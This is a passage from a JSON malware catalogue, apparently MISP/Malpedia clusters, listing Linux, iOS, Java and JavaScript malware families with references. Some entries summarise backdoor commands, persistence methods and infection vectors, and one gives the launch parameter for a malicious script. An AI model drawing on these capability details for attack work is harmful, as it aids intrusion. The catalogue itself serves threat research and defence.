"http://contagiodump.blogspot.com/2012/12/dec-2012-linuxchapro-trojan-apache.html", "http://blog.eset.com/2012/12/18/malicious-apache-module-used-for-content-injection-linuxchapro-a" ], "synonyms": [], "type": [] }, "uuid": "700366d8-4036-4e48-9a5f-bd6e09fb9b6b", "value": "Chapro" }, { "description": "This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer", "https://github.com/pooler/cpuminer" ], "synonyms": [], "type": [] }, "uuid": "8a42a699-1746-498b-a558-e7113bb916c0", "value": "Cpuminer (ELF)" }, { "description": "This payload has been used to compromise kernel.org back in August of 2011 and has hit cPanel Support which in turn, has infected quite a few cPanel servers. It is a credential stealing payload which steals SSH keys, passwords, and potentially other credentials.\r\n\r\nThis family is part of a wider range of tools which are described in detail in the operation windigo whitepaper by ESET.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ebury", "https://www.welivesecurity.com/wp-content/uploads/2014/03/operation_windigo.pdf", "https://www.welivesecurity.com/2017/10/30/windigo-ebury-update-2/", "https://www.justice.gov/opa/pr/russian-citizen-pleads-guilty-involvement-global-botnet-conspiracy", "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/" ], "synonyms": [], "type": [] }, "uuid": "ce79265c-a467-4a17-b27d-7ec7954688d5", "value": "Ebury" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.erebus", "https://blog.trendmicro.com/trendlabs-security-intelligence/erebus-resurfaces-as-linux-ransomware/" ], "synonyms": [], "type": [] }, "uuid": "479353aa-c6d7-47a7-b5f0-3f97fd904864", "value": "Erebus (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.ext4", "https://www.recordedfuture.com/chinese-cyberespionage-operations/" ], "synonyms": [], "type": [] }, "uuid": "79b2b3c0-6119-4511-9c33-2a48532b6a60", "value": "ext4" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.haiduc", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [], "type": [] }, "uuid": "dd85732f-cbf8-4f2c-af5c-f51ef7d99b6a", "value": "Haiduc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hajime", "https://security.rapiditynetworks.com/publications/2016-10-16/hajime.pdf", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://x86.re/blog/hajime-a-follow-up/", "http://blog.netlab.360.com/hajime-status-report-en/", "https://www.symantec.com/connect/blogs/hajime-worm-battles-mirai-control-internet-things", "https://security.radware.com/WorkArea/DownloadAsset.aspx?id=1461", "https://blog.netlab.360.com/quick-summary-port-8291-scan-en/", "https://github.com/Psychotropos/hajime_hashes" ], "synonyms": [], "type": [] }, "uuid": "ff8ee85f-4175-4f5a-99e5-0cbc378f1489", "value": "Hajime" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hakai", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "0839c28a-ea11-44d4-93d1-24b246ef6743", "value": "Hakai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.hideandseek", "https://www.bleepingcomputer.com/news/security/hide-and-seek-becomes-first-iot-botnet-capable-of-surviving-device-reboots/", "https://labs.bitdefender.com/2018/01/new-hide-n-seek-iot-botnet-using-custom-built-peer-to-peer-communication-spotted-in-the-wild/", "https://blog.netlab.360.com/hns-botnet-recent-activities-en/", "https://www.bleepingcomputer.com/news/security/hns-evolves-from-iot-to-cross-platform-botnet/", "https://labs.bitdefender.com/2018/05/hide-and-seek-iot-botnet-resurfaces-with-new-tricks-persistence/", "https://www.bleepingcomputer.com/news/security/new-hns-iot-botnet-has-already-amassed-14k-bots/" ], "synonyms": [ "HNS" ], "type": [] }, "uuid": "41bf8f3e-bb6a-445d-bb74-d08aae61a94b", "value": "Hide and Seek" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.iot_reaper", "http://blog.netlab.360.com/iot_reaper-a-rappid-spreading-new-iot-botnet-en/", "https://krebsonsecurity.com/2017/10/reaper-calm-before-the-iot-security-storm", "https://research.checkpoint.com/new-iot-botnet-storm-coming/", "https://embedi.com/blog/grim-iot-reaper-1-and-0-day-vulnerabilities-at-the-service-of-botnets/" ], "synonyms": [ "IoTroop", "Reaper" ], "type": [] }, "uuid": "37c357a1-ec09-449f-b5a9-c1ef1fba2de2", "value": "IoT Reaper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.jenx", "https://blog.radware.com/security/2018/02/jenx-los-calvos-de-san-calvicie/" ], "synonyms": [], "type": [] }, "uuid": "6a4365fc-8448-4270-ba93-0341788d004b", "value": "JenX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.kaiten", "https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/kaiten-std-router-ddos-malware-threat-advisory.pdf" ], "synonyms": [ "STD" ], "type": [] }, "uuid": "9b618703-58f6-4f0b-83a4-d4f13e2e5d12", "value": "Kaiten" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.lady", "https://news.drweb.com/news/?i=10140&lng=en" ], "synonyms": [], "type": [] }, "uuid": "f8b91c34-b4f0-4ef2-b9fb-15bd5ec0a66d", "value": "Lady" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mikey", "http://www.morphick.com/resources/lab-blog/mikey-linux-keylogger" ], "synonyms": [], "type": [] }, "uuid": "aae3b83d-a116-4ebc-aae0-f6327ef174ea", "value": "MiKey" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai", "https://www.bleepingcomputer.com/news/security/mirai-activity-picks-up-once-more-after-publication-of-poc-exploit-code/", "http://osint.bambenekconsulting.com/feeds/", "https://krebsonsecurity.com/2017/12/mirai-iot-botnet-co-authors-plead-guilty/", "https://honeynet.org/sites/default/files/Bots_Keep_Talking_To_Us.pdf", "https://krebsonsecurity.com/2016/10/source-code-for-iot-botnet-mirai-released/", "https://isc.sans.edu/diary/22786", "https://github.com/jgamblin/Mirai-Source-Code", "http://www.simonroses.com/2016/10/mirai-ddos-botnet-source-code-binary-analysis/", "https://researchcenter.paloaltonetworks.com/2018/07/unit42-finds-new-mirai-gafgyt-iotlinux-botnet-campaigns/" ], "synonyms": [], "type": [] }, "uuid": "17e12216-a303-4a00-8283-d3fe92d0934c", "value": "Mirai (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mokes", "https://securelist.com/from-linux-to-windows-new-family-of-cross-platform-desktop-backdoors-discovered/73503/" ], "synonyms": [], "type": [] }, "uuid": "6d5a5357-4126-4950-b8c3-ee78b1172217", "value": "Mokes (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.moose", "http://www.welivesecurity.com/2015/05/26/moose-router-worm/", "http://gosecure.net/2016/11/02/exposing-the-ego-market-the-cybercrime-performed-by-the-linux-moose-botnet/", "http://www.welivesecurity.com/2016/11/02/linuxmoose-still-breathing/" ], "synonyms": [], "type": [] }, "uuid": "7fdb91ea-52dc-499c-81f9-3dd824e2caa0", "value": "Moose" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.mrblack", "https://news.drweb.com/?i=5760&c=23&lng=en" ], "synonyms": [], "type": [] }, "uuid": "fc047e32-9cf2-4a92-861a-be882efd8a50", "value": "MrBlack" }, { "description": "Mirai variant by actor \"Anarchy\" that used CVE-2017-17215 in July 2018 to compromise 18,000+ devices.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.owari", "https://www.fortinet.com/blog/threat-research/a-wicked-family-of-bots.html", "https://twitter.com/360Netlab/status/1019759516789821441", "https://twitter.com/hrbrmstr/status/1019922651203227653", "https://blog.newskysecurity.com/understanding-the-iot-hacker-a-conversation-with-owari-sora-iot-botnet-author-117feff56863", "https://www.bleepingcomputer.com/news/security/router-crapfest-malware-author-builds-18-000-strong-botnet-in-a-day/", "https://www.scmagazine.com/malware-author-anarchy-builds-18000-strong-huawei-router-botnet/article/782395/", "https://twitter.com/ankit_anubhav/status/1019647993547550720" ], "synonyms": [], "type": [] }, "uuid": "ec67f206-6464-48cf-a012-3cdfc1278488", "value": "Owari" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.penquin_turla", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_AppendixB.pdf", "https://twitter.com/juanandres_gs/status/944741575837528064", "https://securelist.com/files/2017/04/Penquins_Moonlit_Maze_PDF_eng.pdf" ], "synonyms": [], "type": [] }, "uuid": "262e0cf2-2fed-4d37-8d7a-0fd62c712840", "value": "Penquin Turla" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.perlbot", "https://documents.trendmicro.com/assets/Perl-Based_Shellbot_Looks_to_Target_Organizations_via_C&C_appendix.pdf" ], "synonyms": [ "DDoS Perl IrcBot", "ShellBot" ], "type": [] }, "uuid": "24b77c9b-7e7e-4192-8161-b6727728170f", "value": "PerlBot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.persirai", "http://blog.trendmicro.com/trendlabs-security-intelligence/persirai-new-internet-things-iot-botnet-targets-ip-cameras/" ], "synonyms": [], "type": [] }, "uuid": "2ee05352-3d4a-448b-825d-9d6c10792bf7", "value": "Persirai" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.r2r2", "https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/" ], "synonyms": [], "type": [] }, "uuid": "759f8590-a049-4c14-be8a-e6605e2cd43d", "value": "r2r2" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rakos", "http://www.welivesecurity.com/2016/12/20/new-linuxrakos-threat-devices-servers-ssh-scan/" ], "synonyms": [], "type": [] }, "uuid": "4592384c-48a7-4e16-b492-7add50a7d2f5", "value": "Rakos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.rex", "https://rednaga.io/2016/09/21/reversing_go_binaries_like_a_pro/", "https://thisissecurity.net/2016/10/28/octopus-rex-evolution-of-a-multi-task-botnet/" ], "synonyms": [], "type": [] }, "uuid": "49639ff5-e0be-4b6a-850b-d5d8dd37e62b", "value": "Rex" }, { "description": "Satori is a variation of elf.mirai which was first detected around 2017-11-27 by 360 Netlab. It uses exploit to exhibit worm-like behaviour to spread over ports 37215 and 52869 (CVE-2014-8361).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.satori", "https://www.arbornetworks.com/blog/asert/the-arc-of-satori/", "http://blog.netlab.360.com/art-of-steal-satori-variant-is-robbing-eth-bitcoin-by-replacing-wallet-address-en/", "https://blog.radware.com/security/botnets/2018/02/new-satori-botnet-variant-enslaves-thousands-dasan-wifi-routers/", "http://www.eweek.com/security/collaborative-takedown-kills-iot-worm-satori", "http://blog.netlab.360.com/warning-satori-a-new-mirai-variant-is-spreading-in-worm-style-on-port-37215-and-52869-en/", "https://krebsonsecurity.com/2018/09/alleged-satori-iot-botnet-operator-sought-media-spotlight-got-indicted/" ], "synonyms": [], "type": [] }, "uuid": "9e5d83a8-1181-43fe-a77f-28c8c75ffbd0", "value": "Satori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shellbind", "http://blog.trendmicro.com/trendlabs-security-intelligence/linux-users-urged-update-new-threat-exploits-sambacry" ], "synonyms": [], "type": [] }, "uuid": "b51caf06-736e-46fc-9b13-48b0b81df4b7", "value": "ShellBind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.shishiga", "https://www.welivesecurity.com/2017/04/25/linux-shishiga-malware-using-lua-scripts/" ], "synonyms": [], "type": [] }, "uuid": "51da734c-70dd-4337-ab08-ab61457e0da5", "value": "Shishiga" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.spamtorte", "http://cyber.verint.com/resource/spamtorte-v2-investigating-a-multi-layered-spam-botnet/" ], "synonyms": [], "type": [] }, "uuid": "7b9a9ea0-04d2-42ef-b72f-9d6476b9e0d0", "value": "Spamtorte" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.sshdoor", "http://contagiodump.blogspot.com/2013/02/linux-sshdoor-sample.html" ], "synonyms": [], "type": [] }, "uuid": "275d65b9-0894-4c9b-a255-83daddb2589c", "value": "SSHDoor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.stantinko", "https://www.welivesecurity.com/2017/07/20/stantinko-massive-adware-campaign-operating-covertly-since-2012/" ], "synonyms": [], "type": [] }, "uuid": "e8c131df-ee3b-41d4-992d-71d3090d2d98", "value": "Stantinko" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.torii", "https://blog.avast.com/new-torii-botnet-threat-research" ], "synonyms": [], "type": [] }, "uuid": "a874575e-0ad7-464d-abb6-8f4b7964aa92", "value": "Torii" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.trump_bot", "http://paper.seebug.org/345/" ], "synonyms": [], "type": [] }, "uuid": "feb6a5f6-32f9-447d-af9c-08e499457883", "value": "Trump Bot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.tsunami", "http://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/", "http://get.cyberx-labs.com/radiation-report", "https://www.8ackprotect.com/blog/big_brother_is_attacking_you" ], "synonyms": [ "Amnesia", "Radiation" ], "type": [] }, "uuid": "21540126-d0bb-42ce-9b93-341fedb94cac", "value": "Tsunami" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.turla_rat" ], "synonyms": [], "type": [] }, "uuid": "1b62a421-c0db-4425-bcb2-a4925d5d33e0", "value": "Turla RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.umbreon", "http://blog.trendmicro.com/trendlabs-security-intelligence/pokemon-themed-umbreon-linux-rootkit-hits-x86-arm-systems/", "http://contagiodump.blogspot.com/2018/03/rootkit-umbreon-umreon-x86-arm-samples.html" ], "synonyms": [ "Espeon" ], "type": [] }, "uuid": "637000f7-4363-44e0-b795-9cfb7a3dc460", "value": "Umbreon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.vpnfilter", "https://blog.talosintelligence.com/2018/06/vpnfilter-update.html?m=1", "https://blog.talosintelligence.com/2018/09/vpnfilter-part-3.html", "https://securelist.com/vpnfilter-exif-to-c2-mechanism-analysed/85721/", "https://blog.trendmicro.com/trendlabs-security-intelligence/vpnfilter-affected-devices-still-riddled-with-19-vulnerabilities", "https://www.justice.gov/opa/pr/justice-department-announces-actions-disrupt-advanced-persistent-threat-28-botnet-infected", "https://blog.talosintelligence.com/2018/05/VPNFilter.html", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/sophos-VPN-Filter-analysis-v2.pdf?la=en", "https://www.symantec.com/blogs/threat-intelligence/vpnfilter-iot-malware" ], "synonyms": [], "type": [] }, "uuid": "5ad30da2-2645-4893-acd9-3f8e0fbb5500", "value": "elf.vpnfilter" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wellmess" ], "synonyms": [], "type": [] }, "uuid": "b0046a6e-3b8b-45ad-a357-dabc46aba7de", "value": "elf.wellmess" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.wirenet", "http://contagiodump.blogspot.com/2012/12/aug-2012-backdoorwirenet-osx-and-linux.html", "https://news.drweb.com/show/?i=2679&lng=en&c=14" ], "synonyms": [], "type": [] }, "uuid": "47a8fedb-fd60-493a-9b7d-082bdb85621e", "value": "Wirenet (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xagent", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", "http://researchcenter.paloaltonetworks.com/2016/02/a-look-into-fysbis-sofacys-linux-backdoor/", "https://download.bitdefender.com/resources/media/materials/white-papers/en/Bitdefender_In-depth_analysis_of_APT28%E2%80%93The_Political_Cyber-Espionage.pdf", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" ], "synonyms": [ "chopstick", "fysbis", "splm" ], "type": [] }, "uuid": "0a7d9d22-a26d-4a2b-ab9b-b296176c3ecf", "value": "X-Agent (ELF)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xaynnalc", "https://twitter.com/michalmalik/status/846368624147353601" ], "synonyms": [], "type": [] }, "uuid": "32b95dc7-03a6-45ab-a991-466208dd92d2", "value": "Xaynnalc" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xbash", "https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/" ], "synonyms": [], "type": [] }, "uuid": "ee54fc1e-c574-4836-8cdb-992ac38cef32", "value": "Xbash" }, { "description": "Linux DDoS C&C Malware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.xorddos", "https://www.cdnetworks.com/resources/whitepapers/sg/Whitepaper23.pdf", "https://www.fireeye.com/blog/threat-research/2015/02/anatomy_of_a_brutef.html", "https://en.wikipedia.org/wiki/Xor_DDoS" ], "synonyms": [], "type": [] }, "uuid": "7f9df618-4bd1-44a1-ad88-e5930373aac4", "value": "XOR DDoS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/elf.zollard", "https://blogs.cisco.com/security/the-internet-of-everything-including-malware" ], "synonyms": [ "darlloz" ], "type": [] }, "uuid": "9218630d-0425-4b18-802c-447a9322990d", "value": "Zollard" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "8269e779-db23-4c94-aafb-36ee94879417", "value": "DualToy (iOS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" ], "synonyms": [], "type": [] }, "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", "value": "GuiInject" }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bc32df24-8e80-44bc-80b0-6a4d55661aa5", "value": "WireLurker (iOS)" }, { "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "http://malware-traffic-analysis.net/2017/07/04/index.html", "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" ], "synonyms": [ "AlienSpy", "Frutas", "JBifrost", "JSocket", "Sockrat", "UNRECOM" ], "type": [] }, "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", "https://objective-see.com/blog/blog_0x28.html", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" ], "synonyms": [ "Trupto" ], "type": [] }, "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://github.com/java-rat", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered" ], "synonyms": [ "Jacksbot" ], "type": [] }, "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", "value": "jRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" ], "synonyms": [], "type": [] }, "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", "value": "jSpy" }, { "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/", "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/" ], "synonyms": [], "type": [] }, "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market", "https://www.digitrustgroup.com/java-rat-qrat/" ], "synonyms": [ "Quaverse RAT" ], "type": [] }, "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", "value": "QRat" }, { "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", "https://github.com/shotskeber/Ratty" ], "synonyms": [], "type": [] }, "uuid": "da032a95-b02a-4af2-b563-69f686653af4", "value": "Ratty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" ], "synonyms": [], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", "value": "AIRBREAK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], "type": [] }, "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], "type": [] }, "uuid": "efbb5a7c-8c01-4aca-ac21-8dd614b256f7", "value": "CACTUSTORCH" }, { "description": "WebAssembly-based crpyto miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", "https://twitter.com/JohnLaTwC/status/983011262731714565" ], "synonyms": [], "type": [] }, "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", "value": "CryptoNight" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" ], "synonyms": [ "Roblox Trade Assist" ], "type": [] }, "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", "value": "CukieGrab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", "https://twitter.com/ItsReallyNick/status/1059898708286939136" ], "synonyms": [], "type": [] }, "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd", "value": "Griffon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" ], "synonyms": [], "type": [] }, "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", "value": "KopiLuwak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/" ], "synonyms": [], "type": [] }, "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", "value": "magecart" }, { "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ "SpicyOmelette" ], "type": [] }, "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" ], "synonyms": [], "type": [] }, "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", "value": "Powmet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "http://resources.infosecinstitute.com/scanbox-framework/" ], "synonyms": [], "type": [] }, "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], "type": [] }, "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", "value": "HTML5 Encoding" }, { "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", "meta": { "refs": [ 